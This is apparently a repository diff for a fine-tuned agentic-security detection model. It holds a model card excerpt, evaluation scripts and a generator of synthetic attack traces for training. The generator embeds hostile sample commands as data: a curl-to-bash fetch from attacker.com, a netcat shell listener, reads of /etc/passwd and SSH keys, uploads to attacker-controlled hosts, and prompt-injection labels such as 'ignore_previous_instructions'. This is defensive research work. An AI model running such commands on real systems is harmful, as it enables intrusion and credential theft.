+- Prototyping security analysis tools
+- Benchmarking other security models
+- Understanding OWASP GenAI vulnerabilities
+### ❌ Not Recommended
+- Production security monitoring (66.7% FPR)
+- Fully automated security decisions
+- Mission-critical security applications
+- Regulatory compliance tools (without extensive validation)
+## Limitations
+1. **High False Positive Rate**: 66.7% FPR on trace classification
+2. **Synthetic Data Bias**: 43% synthetic data may not reflect real attacks
+3. **Model Size**: 8B parameters may miss complex attack patterns
+4. **Domain Specificity**: Focused on agentic security, may not generalize
+5. **ARM64 Only**: Training validated only on NVIDIA DGX Spark
+See research paper Section 0.7 for detailed limitations.
+## Ethical Considerations
+- **Defensive Use Only**: Model designed for security research and defense
+- **Attack Pattern Exposure**: Contains knowledge of attack techniques
+- **Human Oversight Required**: Not suitable for autonomous security decisions
+- **Responsible Disclosure**: Follow responsible disclosure for any discovered vulnerabilities
+## Citation
+```bibtex
+@article{foundation-sec-2025,
+  title={Foundation-Sec: Specialized Fine-Tuning for Agentic AI Security},
+  author={Your Name},
+  year={2025},
+  url={https://huggingface.co/guerilla7/agentic-safety-gguf}
+}
+```
+## License
+Apache 2.0
+## Research Paper
+Full methodology, statistical analysis, and detailed results available in `RESEARCH_PAPER.pdf` (25 pages).
+## Links
+- **Datasets**: [guerilla7/agentic-safety-gguf](https://huggingface.co/datasets/guerilla7/agentic-safety-gguf)
+- **GGUF Model**: Available in this repository
+- **Training Scripts**: Included in this repository
+## Acknowledgements
+Built on Llama 3.1 8B Instruct by Meta. Inspired by OWASP GenAI Security Project and open-source AI safety community.

evaluate_mcqa.py ADDED Viewed

	@@ -0,0 +1,55 @@

+#!/usr/bin/env python3
+"""Custom MCQA evaluation for cybersecurity questions."""
+import json
+import argparse
+from transformers import AutoModelForCausalLM, AutoTokenizer
+import torch
+def evaluate_mcqa(model_name, questions_file):
+    """Evaluate model on custom MCQA questions."""
+    # Load model
+    print(f"Loading model: {model_name}")
+    tokenizer = AutoTokenizer.from_pretrained(model_name)
+    model = AutoModelForCausalLM.from_pretrained(
+        model_name,
+        torch_dtype=torch.float16,
+        device_map="auto"
+    )
+    # Load questions
+    with open(questions_file) as f:
+        questions = [json.loads(line) for line in f]
+    correct = 0
+    total = len(questions)
+    for i, q in enumerate(questions):
+        prompt = f"{q['question']}\nA) {q['A']}\nB) {q['B']}\nC) {q['C']}\nD) {q['D']}\nAnswer:"
+        inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
+        outputs = model.generate(**inputs, max_new_tokens=10)
+        response = tokenizer.decode(outputs[0], skip_special_tokens=True)
+        # Extract answer (A/B/C/D)
+        predicted = response.split("Answer:")[-1].strip()[0].upper()
+        if predicted == q['answer']:
+            correct += 1
+        if (i + 1) % 10 == 0:
+            print(f"Progress: {i+1}/{total}")
+    accuracy = 100.0 * correct / total
+    print(f"\nAccuracy: {correct}/{total} = {accuracy:.1f}%")
+    return accuracy
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--model", required=True, help="Model name or path")
+    parser.add_argument("--questions", default="datasets/cybersecurity_questions.jsonl")
+    args = parser.parse_args()
+    evaluate_mcqa(args.model, args.questions)

evaluate_mmlu.py ADDED Viewed

	@@ -0,0 +1,195 @@

+#!/usr/bin/env python3
+"""
+Evaluate Foundation-Sec-8B base model on custom cybersecurity MCQA benchmark.
+This provides the baseline comparison for our fine-tuned V2/V3/V4 models.
+"""
+import json
+import torch
+from transformers import AutoTokenizer, AutoModelForCausalLM
+from tqdm import tqdm
+import argparse
+from datetime import datetime
+def load_questions(filepath):
+    """Load the 70-question custom MCQA benchmark."""
+    questions = []
+    with open(filepath, 'r') as f:
+        for line in f:
+            questions.append(json.loads(line))
+    return questions
+def format_prompt(question_data):
+    """Format question in the same way as lm-eval-harness."""
+    question = question_data['question']
+    choices = question_data['choices']
+    # Format as multiple choice
+    prompt = f"Question: {question}\n\n"
+    for i, choice in enumerate(choices):
+        prompt += f"{chr(65+i)}) {choice}\n"
+    prompt += "\nAnswer:"
+    return prompt
+def get_model_answer(model, tokenizer, prompt, device):
+    """Get model's predicted answer (A, B, C, or D)."""
+    # Format in Llama 3.1 Instruct style
+    full_prompt = f"""<|begin_of_text|><|start_header_id|>system<|end_header_id|>
+You are a cybersecurity expert. Answer the following multiple choice question by selecting the letter of the correct answer (A, B, C, or D).<|eot_id|>
+<|start_header_id|>user<|end_header_id|>
+{prompt}<|eot_id|>
+<|start_header_id|>assistant<|end_header_id|>
+"""
+    inputs = tokenizer(full_prompt, return_tensors="pt").to(device)
+    with torch.no_grad():
+        outputs = model.generate(
+            **inputs,
+            max_new_tokens=5,
+            temperature=0.1,
+            do_sample=False,
+            pad_token_id=tokenizer.eos_token_id
+        )
+    response = tokenizer.decode(outputs[0][inputs['input_ids'].shape[1]:], skip_special_tokens=True)
+    response = response.strip()
+    # Extract answer letter (A, B, C, or D)
+    response_upper = response.upper()
+    for letter in ['A', 'B', 'C', 'D']:
+        if letter in response_upper[:10]:  # Check first 10 chars
+            return ord(letter) - ord('A')  # Convert to 0-3 index
+    # If no clear answer, return -1
+    return -1
+def evaluate_model(model_name, questions_file, output_file):
+    """Evaluate model on all questions and save results."""
+    print(f"Loading model: {model_name}")
+    device = "cuda" if torch.cuda.is_available() else "cpu"
+    tokenizer = AutoTokenizer.from_pretrained(model_name)
+    model = AutoModelForCausalLM.from_pretrained(
+        model_name,
+        torch_dtype=torch.bfloat16,
+        device_map="auto"
+    )
+    model.eval()
+    print(f"Loading questions from: {questions_file}")
+    questions = load_questions(questions_file)
+    print(f"Total questions: {len(questions)}")
+    # Track results
+    results = {
+        'model': model_name,
+        'timestamp': datetime.now().isoformat(),
+        'total_questions': len(questions),
+        'detailed_results': [],
+        'category_breakdown': {}
+    }
+    correct_total = 0
+    correct_agentic = 0
+    total_agentic = 0
+    correct_traditional = 0
+    total_traditional = 0
+    print("\nEvaluating...")
+    for i, q in enumerate(tqdm(questions)):
+        prompt = format_prompt(q)
+        predicted = get_model_answer(model, tokenizer, prompt, device)
+        correct_answer = q['answer']
+        is_correct = (predicted == correct_answer)
+        category = q.get('category', 'unknown')
+        is_agentic = category == 'agentic_security'
+        if is_correct:
+            correct_total += 1
+            if is_agentic:
+                correct_agentic += 1
+            else:
+                correct_traditional += 1
+        if is_agentic:
+            total_agentic += 1
+        else:
+            total_traditional += 1
+        # Track by category
+        if category not in results['category_breakdown']:
+            results['category_breakdown'][category] = {'correct': 0, 'total': 0}
+        results['category_breakdown'][category]['total'] += 1
+        if is_correct:
+            results['category_breakdown'][category]['correct'] += 1
+        results['detailed_results'].append({
+            'question_id': i,
+            'category': category,
+            'is_agentic': is_agentic,
+            'predicted': predicted,
+            'correct_answer': correct_answer,
+            'is_correct': is_correct,
+            'question': q['question'][:100] + '...' if len(q['question']) > 100 else q['question']
+        })
+    # Calculate final metrics
+    results['metrics'] = {
+        'overall_accuracy': correct_total / len(questions),
+        'overall_correct': correct_total,
+        'overall_total': len(questions),
+        'agentic_accuracy': correct_agentic / total_agentic if total_agentic > 0 else 0,
+        'agentic_correct': correct_agentic,
+        'agentic_total': total_agentic,
+        'traditional_accuracy': correct_traditional / total_traditional if total_traditional > 0 else 0,
+        'traditional_correct': correct_traditional,
+        'traditional_total': total_traditional
+    }
+    # Save results
+    print(f"\nSaving results to: {output_file}")
+    with open(output_file, 'w') as f:
+        json.dump(results, f, indent=2)
+    # Print summary
+    print("\n" + "="*60)
+    print("EVALUATION RESULTS")
+    print("="*60)
+    print(f"Model: {model_name}")
+    print(f"Overall Accuracy: {results['metrics']['overall_accuracy']*100:.2f}% ({correct_total}/{len(questions)})")
+    print(f"Agentic Questions: {results['metrics']['agentic_accuracy']*100:.2f}% ({correct_agentic}/{total_agentic})")
+    print(f"Traditional Questions: {results['metrics']['traditional_accuracy']*100:.2f}% ({correct_traditional}/{total_traditional})")
+    print("\nCategory Breakdown:")
+    for cat, stats in sorted(results['category_breakdown'].items()):
+        acc = stats['correct'] / stats['total'] * 100
+        print(f"  {cat}: {acc:.1f}% ({stats['correct']}/{stats['total']})")
+    print("="*60)
+    return results
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description='Evaluate base model on custom MCQA')
+    parser.add_argument('--model', type=str,
+                       default='fdtn-ai/Foundation-Sec-8B-Instruct',
+                       help='HuggingFace model name')
+    parser.add_argument('--questions', type=str,
+                       default='cybersecurity_questions.jsonl',
+                       help='Path to questions file')
+    parser.add_argument('--output', type=str,
+                       default='base_model_evaluation_results.json',
+                       help='Output JSON file for results')
+    args = parser.parse_args()
+    print(f"Foundation-Sec-8B Base Model Evaluation")
+    print(f"=========================================\n")
+    results = evaluate_model(args.model, args.questions, args.output)

evaluate_traces.py ADDED Viewed

	@@ -0,0 +1,60 @@

+#!/usr/bin/env python3
+"""Trace security classification evaluation."""
+import json
+import argparse
+from transformers import AutoModelForCausalLM, AutoTokenizer
+import torch
+def evaluate_traces(model_name, benign_file, malicious_file):
+    """Classify traces as benign or malicious."""
+    # Load model
+    print(f"Loading model: {model_name}")
+    tokenizer = AutoTokenizer.from_pretrained(model_name)
+    model = AutoModelForCausalLM.from_pretrained(
+        model_name,
+        torch_dtype=torch.float16,
+        device_map="auto"
+    )
+    # Load traces
+    with open(benign_file) as f:
+        benign_traces = json.load(f)
+    with open(malicious_file) as f:
+        malicious_traces = json.load(f)
+    def classify_trace(trace):
+        prompt = f"Analyze this OpenTelemetry trace for security threats. Is it benign or malicious?\n\nTrace: {json.dumps(trace)}\n\nClassification:"
+        inputs = tokenizer(prompt, return_tensors="pt", truncation=True, max_length=2048).to(model.device)
+        outputs = model.generate(**inputs, max_new_tokens=50)
+        response = tokenizer.decode(outputs[0], skip_special_tokens=True).lower()
+        return "malicious" in response
+    # Evaluate
+    tp = sum(1 for t in malicious_traces if classify_trace(t))  # True positives
+    tn = sum(1 for t in benign_traces if not classify_trace(t))  # True negatives
+    fp = len(benign_traces) - tn  # False positives
+    fn = len(malicious_traces) - tp  # False negatives
+    accuracy = 100.0 * (tp + tn) / (len(benign_traces) + len(malicious_traces))
+    fpr = 100.0 * fp / len(benign_traces) if len(benign_traces) > 0 else 0
+    print(f"\nResults:")
+    print(f"  Accuracy: {accuracy:.1f}%")
+    print(f"  True Positives: {tp}/{len(malicious_traces)}")
+    print(f"  True Negatives: {tn}/{len(benign_traces)}")
+    print(f"  False Positive Rate: {fpr:.1f}%")
+    return accuracy
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--model", required=True, help="Model name or path")
+    parser.add_argument("--benign", default="datasets/benign_traces.json")
+    parser.add_argument("--malicious", default="datasets/malicious_traces.json")
+    args = parser.parse_args()
+    evaluate_traces(args.model, args.benign, args.malicious)

generate_synthetic.py ADDED Viewed

	@@ -0,0 +1,532 @@

+#!/usr/bin/env python3
+"""
+Generate Synthetic OpenTelemetry Workflow Traces for Agentic Security Training
+This script creates synthetic OTEL traces similar in structure to NVIDIA Nemotron
+Safety/Security datasets but independently generated. Each trace includes:
+- Realistic span hierarchies with parent-child relationships
+- Tool invocations (file, network, database, API calls)
+- Attack patterns (exfiltration, injection, privilege escalation)
+- Security indicators and defense mechanisms
+Output: JSONL files with instruction-response pairs for model training
+"""
+import json
+import random
+import uuid
+from datetime import datetime, timedelta
+from pathlib import Path
+from typing import List, Dict, Any
+# Attack categories and patterns
+ATTACK_CATEGORIES = {
+    "tool_exfiltration": {
+        "description": "Unauthorized data extraction via tool invocations",
+        "severity": "critical",
+        "patterns": [
+            "database_query_and_upload",
+            "file_read_and_network_send",
+            "api_scraping_and_storage",
+            "credential_theft_and_transmission"
+        ]
+    },
+    "prompt_injection": {
+        "description": "Malicious prompt manipulation to bypass safety controls",
+        "severity": "high",
+        "patterns": [
+            "ignore_previous_instructions",
+            "role_confusion_attack",
+            "delimiter_injection",
+            "context_smuggling"
+        ]
+    },
+    "privilege_escalation": {
+        "description": "Gradual elevation of access permissions",
+        "severity": "critical",
+        "patterns": [
+            "sudo_request_chain",
+            "role_assumption_attack",
+            "permission_boundary_bypass",
+            "administrative_api_abuse"
+        ]
+    },
+    "policy_violation": {
+        "description": "Regulatory compliance breaches across workflows",
+        "severity": "high",
+        "patterns": [
+            "gdpr_consent_bypass",
+            "hipaa_phi_exposure",
+            "pci_dss_card_data_leak",
+            "soc2_audit_trail_deletion"
+        ]
+    },
+    "stealth_attack": {
+        "description": "Time-delayed or obfuscated attack sequences",
+        "severity": "high",
+        "patterns": [
+            "time_delayed_activation",
+            "gradual_data_aggregation",
+            "semantic_obfuscation",
+            "low_and_slow_exfiltration"
+        ]
+    },
+    "multi_agent_coordination": {
+        "description": "Distributed attack across multiple agents",
+        "severity": "critical",
+        "patterns": [
+            "reconnaissance_and_exploitation",
+            "data_gathering_and_exfiltration",
+            "privilege_escalation_and_lateral_movement",
+            "command_and_control_coordination"
+        ]
+    }
+}
+TOOL_TYPES = {
+    "file_system": ["read_file", "write_file", "list_directory", "delete_file", "create_directory"],
+    "network": ["http_request", "download_file", "upload_file", "dns_lookup", "tcp_connect"],
+    "database": ["query", "insert", "update", "delete", "create_table"],
+    "api": ["rest_call", "graphql_query", "webhook_trigger", "oauth_request"],
+    "system": ["execute_command", "create_process", "modify_registry", "install_package"],
+    "auth": ["login", "authenticate", "get_token", "refresh_credentials", "assume_role"]
+}
+DEFENSE_MECHANISMS = [
+    "rate_limiting",
+    "input_validation",
+    "output_filtering",
+    "permission_check",
+    "anomaly_detection",
+    "content_scanning",
+    "sandboxing",
+    "audit_logging"
+]
+def generate_trace_id() -> str:
+    """Generate realistic OpenTelemetry trace ID"""
+    return uuid.uuid4().hex[:32]
+def generate_span_id() -> str:
+    """Generate realistic OpenTelemetry span ID"""
+    return uuid.uuid4().hex[:16]
+def generate_timestamp(base_time: datetime, offset_seconds: float) -> str:
+    """Generate ISO timestamp with offset"""
+    return (base_time + timedelta(seconds=offset_seconds)).isoformat() + 'Z'
+def generate_tool_invocation(tool_category: str, tool_name: str,
+                             timestamp: str, attack_context: Dict[str, Any]) -> Dict[str, Any]:
+    """Generate realistic tool invocation with parameters"""
+    invocations = {
+        "file_system": {
+            "read_file": {
+                "path": random.choice([
+                    "/home/user/documents/sensitive_data.pdf",
+                    "/var/log/system/credentials.txt",
+                    "/etc/passwd",
+                    "/home/user/.ssh/id_rsa",
+                    "/opt/app/config/database.yml"
+                ]),
+                "bytes_read": random.randint(1024, 10485760)
+            },
+            "list_directory": {
+                "path": random.choice(["/home/user/documents", "/var/www/html", "/tmp", "/opt/secrets"]),
+                "file_count": random.randint(10, 500)
+            }
+        },
+        "network": {
+            "upload_file": {
+                "url": random.choice([
+                    "https://attacker-controlled.com/upload",
+                    "https://suspicious-domain.xyz/api/data",
+                    "http://192.168.1.100:8080/receive",
+                    "https://pastebin.com/api/create"
+                ]),
+                "size_bytes": random.randint(1024, 52428800),
+                "protocol": "https"
+            },
+            "http_request": {
+                "url": random.choice([
+                    "https://api.internal.corp/users/export",
+                    "https://database.company.com/query",
+                    "https://admin.service.com/secrets"
+                ]),
+                "method": random.choice(["GET", "POST", "PUT"]),
+                "status_code": random.choice([200, 201, 403, 500])
+            }
+        },
+        "database": {
+            "query": {
+                "statement": random.choice([
+                    "SELECT * FROM users WHERE role='admin'",
+                    "SELECT credit_card_number, cvv FROM payments",
+                    "SELECT password_hash FROM credentials",
+                    "SELECT ssn, dob FROM patient_records"
+                ]),
+                "rows_returned": random.randint(100, 50000),
+                "execution_time_ms": random.randint(50, 5000)
+            }
+        },
+        "system": {
+            "execute_command": {
+                "command": random.choice([
+                    "sudo -i",
+                    "curl https://attacker.com/shell.sh | bash",
+                    "chmod +x /tmp/backdoor",
+                    "nc -lvp 4444 -e /bin/bash"
+                ]),
+                "exit_code": random.choice([0, 1, 127])
+            }
+        },
+        "auth": {
+            "assume_role": {
+                "target_role": random.choice(["admin", "root", "superuser", "system"]),
+                "current_role": random.choice(["guest", "user", "read_only"]),
+                "success": attack_context.get("defense_active", False) is False
+            }
+        }
+    }
+    base_invocation = invocations.get(tool_category, {}).get(tool_name, {})
+    return {
+        "tool_name": f"{tool_category}.{tool_name}",
+        "timestamp": timestamp,
+        "parameters": base_invocation,
+        "duration_ms": random.randint(10, 5000)
+    }
+def generate_attack_trace(category: str, pattern: str, with_defense: bool = False) -> Dict[str, Any]:
+    """Generate complete OTEL trace with attack pattern"""
+    trace_id = generate_trace_id()
+    base_time = datetime.now()
+    # Generate workflow spans
+    spans = []
+    tool_invocations = []
+    current_time_offset = 0
+    # Attack-specific span generation
+    if category == "tool_exfiltration":
+        # Step 1: Data gathering
+        span1_id = generate_span_id()
+        spans.append({
+            "span_id": span1_id,
+            "parent_span_id": None,
+            "name": "data_gathering",
+            "start_time": generate_timestamp(base_time, current_time_offset),
+            "end_time": generate_timestamp(base_time, current_time_offset + 2.5),
+            "attributes": {"phase": "reconnaissance", "risk_level": "medium"}
+        })
+        # Database query tool
+        tool_invocations.append(generate_tool_invocation(
+            "database", "query",
+            generate_timestamp(base_time, current_time_offset + 0.5),
+            {"defense_active": with_defense}
+        ))
+        current_time_offset += 3
+        # Step 2: Exfiltration attempt
+        span2_id = generate_span_id()
+        spans.append({
+            "span_id": span2_id,
+            "parent_span_id": span1_id,
+            "name": "data_exfiltration",
+            "start_time": generate_timestamp(base_time, current_time_offset),
+            "end_time": generate_timestamp(base_time, current_time_offset + 5.0),
+            "attributes": {"phase": "exfiltration", "risk_level": "critical"}
+        })
+        # Upload to external server
+        tool_invocations.append(generate_tool_invocation(
+            "network", "upload_file",
+            generate_timestamp(base_time, current_time_offset + 1.0),
+            {"defense_active": with_defense}
+        ))
+    elif category == "privilege_escalation":
+        # Gradual elevation sequence
+        roles = ["guest", "user", "power_user", "admin"]
+        for i, role in enumerate(roles[:-1]):
+            span_id = generate_span_id()
+            parent_id = spans[-1]["span_id"] if spans else None
+            spans.append({
+                "span_id": span_id,
+                "parent_span_id": parent_id,
+                "name": f"request_elevation_to_{roles[i+1]}",
+                "start_time": generate_timestamp(base_time, current_time_offset),
+                "end_time": generate_timestamp(base_time, current_time_offset + 1.5),
+                "attributes": {"current_role": role, "target_role": roles[i+1], "risk_level": "high"}
+            })
+            tool_invocations.append(generate_tool_invocation(
+                "auth", "assume_role",
+                generate_timestamp(base_time, current_time_offset + 0.5),
+                {"defense_active": with_defense}
+            ))
+            current_time_offset += random.uniform(2.0, 5.0)
+    elif category == "multi_agent_coordination":
+        # Multiple agents coordinating
+        agents = ["agent_A", "agent_B", "agent_C"]
+        for agent_name in agents:
+            span_id = generate_span_id()
+            parent_id = spans[-1]["span_id"] if spans else None
+            spans.append({
+                "span_id": span_id,
+                "parent_span_id": parent_id,
+                "name": f"{agent_name}_action",
+                "start_time": generate_timestamp(base_time, current_time_offset),
+                "end_time": generate_timestamp(base_time, current_time_offset + 2.0),
+                "attributes": {"agent": agent_name, "coordination": "distributed_attack", "risk_level": "critical"}
+            })
+            # Agent A: reconnaissance, Agent B: data gathering, Agent C: exfiltration
+            if agent_name == "agent_A":
+                tool_invocations.append(generate_tool_invocation(
+                    "file_system", "list_directory",
+                    generate_timestamp(base_time, current_time_offset + 0.5),
+                    {"defense_active": with_defense}
+                ))
+            elif agent_name == "agent_B":
+                tool_invocations.append(generate_tool_invocation(
+                    "database", "query",
+                    generate_timestamp(base_time, current_time_offset + 0.5),
+                    {"defense_active": with_defense}
+                ))
+            else:
+                tool_invocations.append(generate_tool_invocation(
+                    "network", "upload_file",
+                    generate_timestamp(base_time, current_time_offset + 0.5),
+                    {"defense_active": with_defense}
+                ))
+            current_time_offset += 2.5
+    # Attack snapshot with analysis
+    attack_success = not with_defense or random.random() < 0.1  # 10% defense bypass rate
+    # Calculate propagation percentage
+    affected_spans = sum(1 for span in spans if any(attr in str(span.get('attributes', {})).lower() for attr in ['risk', 'attack', 'malicious', 'suspicious']))
+    propagation_percentage = (affected_spans / len(spans) * 100) if spans else 0.0
+    attack_snapshot = {
+        "category": category,
+        "pattern": pattern,
+        "attack_type": ATTACK_CATEGORIES[category]["description"],
+        "severity": ATTACK_CATEGORIES[category]["severity"],
+        "success": attack_success,
+        "propagation_path": " → ".join([span["name"] for span in spans]),
+        "propagation_percentage": propagation_percentage,
+        "total_spans": len(spans),
+        "total_tools": len(tool_invocations),
+        "defense_active": with_defense,
+        "defense_mechanisms": random.sample(DEFENSE_MECHANISMS, k=random.randint(2, 4)) if with_defense else [],
+        "indicators": {
+            "suspicious_network_activity": any(t["tool_name"].startswith("network") for t in tool_invocations),
+            "privilege_changes": any(t["tool_name"].startswith("auth") for t in tool_invocations),
+            "data_volume_anomaly": sum(t.get("parameters", {}).get("bytes_read", 0) for t in tool_invocations) > 1048576,
+            "external_communication": any("attacker" in str(t.get("parameters", {})) for t in tool_invocations)
+        }
+    }
+    return {
+        "trace_id": trace_id,
+        "timestamp": generate_timestamp(base_time, 0),
+        "category": category,
+        "pattern": pattern,
+        "with_defense": with_defense,
+        "otel_trace": {
+            "trace_id": trace_id,
+            "spans": spans,
+            "tool_invocations": tool_invocations
+        },
+        "attack_snapshot": attack_snapshot
+    }
+def convert_to_training_format(trace_data: Dict[str, Any]) -> Dict[str, str]:
+    """Convert OTEL trace to instruction-response training format"""
+    trace = trace_data["otel_trace"]
+    attack = trace_data["attack_snapshot"]
+    # Build instruction (more concise to match original ~644 chars avg)
+    instruction = f"""Analyze the following agentic workflow execution for potential security threats.
+**Trace Information:**
+- Trace ID: {trace_data['trace_id']}
+- Workflow Type: SECURITY
+- Attack Category: {attack['category']}
+- Attack Subcategory: {attack['pattern']}
+- Total Workflow Spans: {attack['total_spans']}
+- Defense Mechanisms: {'Active' if trace_data['with_defense'] else 'Inactive'}
+**Execution Trace:**
+{json.dumps(trace, indent=2)[:800]}
+Provide a comprehensive security analysis."""
+    # Build response with security analysis (more detailed to match original)
+    defense_status = "BLOCKED" if trace_data['with_defense'] and not attack['success'] else "SUCCESSFUL"
+    response = f"""**Agentic Workflow Security Analysis**
+Trace ID: {trace_data['trace_id']}
+Dataset: SYNTHETIC_SECURITY
+**Attack Classification:**
+- Category: {attack['category']}
+- Subcategory: {attack['pattern']}
+- Attack Type: {attack['attack_type']}
+- Severity Level: {attack['severity'].upper()}
+- Attack Status: {defense_status}
+- Success Rate: {'0%' if not attack['success'] else '100%'}
+**Workflow Analysis:**
+- Total Spans Analyzed: {attack['total_spans']}
+- Tool Invocations Detected: {attack['total_tools']}
+- Attack Propagation Path: {attack['propagation_path']}
+- Workflow Complexity Score: {'HIGH' if attack['total_spans'] > 4 else 'MEDIUM' if attack['total_spans'] > 2 else 'LOW'}
+**Security Threat Indicators:**
+"""
+    for indicator, detected in attack['indicators'].items():
+        if detected:
+            response += f"  • {indicator.replace('_', ' ').title()}: DETECTED\n"
+    if trace_data['with_defense']:
+        response += f"\n**Defense Mechanisms Applied:**\n"
+        for mechanism in attack['defense_mechanisms']:
+            response += f"  • {mechanism.replace('_', ' ').title()}: ACTIVE\n"
+    response += f"""
+**Risk Assessment Summary:**
+- Attack Propagation: {attack['propagation_percentage']:.1f}% of workflow spans affected
+- Tool Invocation Risk: {attack['total_tools']} potentially malicious operations
+- Workflow Integrity: {'COMPROMISED' if attack['success'] else 'PROTECTED'}
+- Defense Effectiveness: {'100%' if not attack['success'] and trace_data['with_defense'] else '0%' if attack['success'] else 'N/A'}
+**Recommended Security Controls:**
+"""
+    if attack['category'] == 'tool_exfiltration':
+        response += """1. Implement data loss prevention (DLP) controls on all agent tool outputs
+2. Enable comprehensive egress traffic monitoring and alerting
+3. Enforce principle of least privilege for data access operations
+4. Deploy ML-based anomaly detection for unusual data volumes
+5. Implement workflow-level rate limiting on sensitive operations"""
+    elif attack['category'] == 'privilege_escalation':
+        response += """1. Require multi-factor authentication for all role modification operations
+2. Implement time-based and context-aware access controls
+3. Audit privilege escalation velocity and anomalous patterns
+4. Enable just-in-time (JIT) access provisioning
+5. Monitor cross-agent permission inheritance chains"""
+    elif attack['category'] == 'multi_agent_coordination':
+        response += """1. Deploy cross-agent correlation monitoring and analysis
+2. Implement workflow-level rate limiting and throttling
+3. Enable distributed attack pattern detection across agent network
+4. Isolate agent execution contexts with network segmentation
+5. Monitor inter-agent communication patterns for anomalies"""
+    elif attack['category'] == 'prompt_injection':
+        response += """1. Strengthen input validation and sanitization across all agents
+2. Implement prompt firewall and content filtering
+3. Deploy behavior-based anomaly detection for agent responses
+4. Enable comprehensive audit logging of all prompt variations
+5. Implement real-time security monitoring of agent outputs"""
+    elif attack['category'] == 'stealth_attack':
+        response += """1. Deploy temporal analysis and time-series anomaly detection
+2. Implement workflow state tracking with integrity verification
+3. Enable long-duration attack pattern detection
+4. Monitor for time-delayed or staged attack sequences
+5. Implement continuous behavioral baseline monitoring"""
+    else:  # policy_violation
+        response += """1. Strengthen compliance policy enforcement mechanisms
+2. Deploy real-time policy violation detection and alerting
+3. Implement comprehensive audit logging for compliance tracking
+4. Enable automated policy remediation workflows
+5. Monitor for policy bypass attempts and evasion tactics"""
+    return {
+        "instruction": instruction,
+        "response": response,
+        "trace_id": trace_data['trace_id'],
+        "dataset_type": "synthetic_security",
+        "attack_success": attack['success']
+    }
+def generate_dataset(num_examples: int = 10796, output_dir: str = "./data") -> None:
+    """Generate complete synthetic OTEL trace dataset"""
+    output_path = Path(output_dir)
+    output_path.mkdir(exist_ok=True)
+    print(f"Generating {num_examples} synthetic OpenTelemetry workflow traces...")
+    # Split examples across categories and defense states
+    categories = list(ATTACK_CATEGORIES.keys())
+    examples_per_category = num_examples // len(categories)
+    all_training_examples = []
+    for category in categories:
+        patterns = ATTACK_CATEGORIES[category]["patterns"]
+        for i in range(examples_per_category):
+            pattern = random.choice(patterns)
+            with_defense = i % 2 == 0  # 50% with defense, 50% without
+            # Generate trace
+            trace_data = generate_attack_trace(category, pattern, with_defense)
+            # Convert to training format
+            training_example = convert_to_training_format(trace_data)
+            all_training_examples.append(training_example)
+            if (i + 1) % 100 == 0:
+                print(f"  {category}: {i + 1}/{examples_per_category} traces generated")
+    # Shuffle all examples
+    random.shuffle(all_training_examples)
+    # Save to JSONL
+    output_file = output_path / "synthetic_otel_traces_training.jsonl"
+    with open(output_file, 'w') as f:
+        for example in all_training_examples:
+            f.write(json.dumps(example) + '\n')
+    print(f"\n✓ Generated {len(all_training_examples)} training examples")
+    print(f"✓ Saved to: {output_file}")
+    print(f"✓ File size: {output_file.stat().st_size / 1024 / 1024:.2f} MB")
+    # Generate statistics
+    print(f"\nDataset Statistics:")
+    print(f"- Total examples: {len(all_training_examples)}")
+    print(f"- Categories: {len(categories)}")
+    print(f"- Examples per category: ~{examples_per_category}")
+    print(f"\nCategory breakdown:")
+    for category in categories:
+        count = sum(1 for ex in all_training_examples if category in ex['instruction'])
+        print(f"  - {category}: {count} examples ({count/len(all_training_examples)*100:.1f}%)")
+if __name__ == "__main__":
+    # Set random seed for reproducibility
+    random.seed(42)
+    # Generate dataset (45,825 examples to match NVIDIA dataset size)
+    generate_dataset(num_examples=45825, output_dir="./data")
+    print("\n✓ Synthetic OTEL trace dataset generation complete!")
+    print("\nThis dataset is independently generated and does not use NVIDIA Nemotron data.")
+    print("It follows similar OpenTelemetry trace structures for agentic security research.")

install_arm64.sh ADDED Viewed

	@@ -0,0 +1,42 @@

+#!/bin/bash
+# ARM64 + CUDA setup for NVIDIA DGX Spark
+set -e
+echo "Setting up ARM64 environment..."
+# 1. Install ARM64-compatible PyTorch with CUDA 12.1
+echo "[1/4] Installing PyTorch..."
+pip install torch==2.3.0+cu121 torchvision==0.18.0+cu121 torchaudio==2.3.0 \
+  --index-url https://download.pytorch.org/whl/cu121
+# 2. Build BitsAndBytes from source (no ARM64 wheels)
+echo "[2/4] Building BitsAndBytes..."
+sudo apt-get update
+sudo apt-get install -y build-essential cmake libopenblas-dev
+pip install bitsandbytes==0.43.0 --no-binary bitsandbytes
+# 3. Install Transformers stack
+echo "[3/4] Installing dependencies..."
+pip install transformers==4.40.0 \
+  datasets==2.18.0 \
+  peft==0.10.0 \
+  accelerate==0.28.0 \
+  sentencepiece==0.2.0 \
+  scikit-learn==1.4.1
+# 4. Configure vLLM for ARM64
+echo "[4/4] Configuring vLLM..."
+export VLLM_USE_TRITON_FLASH_ATTN=0
+export VLLM_ATTENTION_BACKEND=TORCH_SDPA
+echo 'export VLLM_USE_TRITON_FLASH_ATTN=0' >> ~/.bashrc
+echo 'export VLLM_ATTENTION_BACKEND=TORCH_SDPA' >> ~/.bashrc
+pip install vllm==0.4.0.post1
+# Verify
+python -c "import torch; print(f'PyTorch: {torch.__version__}'); print(f'CUDA: {torch.cuda.is_available()}')"
+python -c "import bitsandbytes; print(f'BitsAndBytes: {bitsandbytes.__version__}')"
+echo ""
+echo "✓ ARM64 setup complete!"

train.py ADDED Viewed

	@@ -0,0 +1,378 @@

+# This python script is the main fine-tuning script optimized for NVIDIA DGX Spark
+# Copy and paste this code into a file named finetune_foundation_sec.py
+import torch
+import os
+# Disable Triton compilation to avoid ARM64 issues
+os.environ['TORCHDYNAMO_DISABLE'] = '1'
+os.environ['TORCH_COMPILE_DISABLE'] = '1'
+from unsloth import FastLanguageModel
+from datasets import load_dataset
+from trl import SFTTrainer
+from transformers import TrainingArguments, TrainerCallback
+import time
+import sys
+from datetime import datetime, timedelta
+import json
+# Progress tracking class
+class ProgressCallback(TrainerCallback):
+    def __init__(self, total_steps):
+        self.total_steps = total_steps
+        self.start_time = None
+        self.step_times = []
+        self.losses = []
+        self.last_update = 0
+        self.crashed = False
+    def on_train_begin(self, args, state, control, **kwargs):
+        self.start_time = time.time()
+        print("\n" + "="*80)
+        print("Training Started: {}".format(datetime.now().strftime("%Y-%m-%d %H:%M:%S")))
+        print("="*80 + "\n")
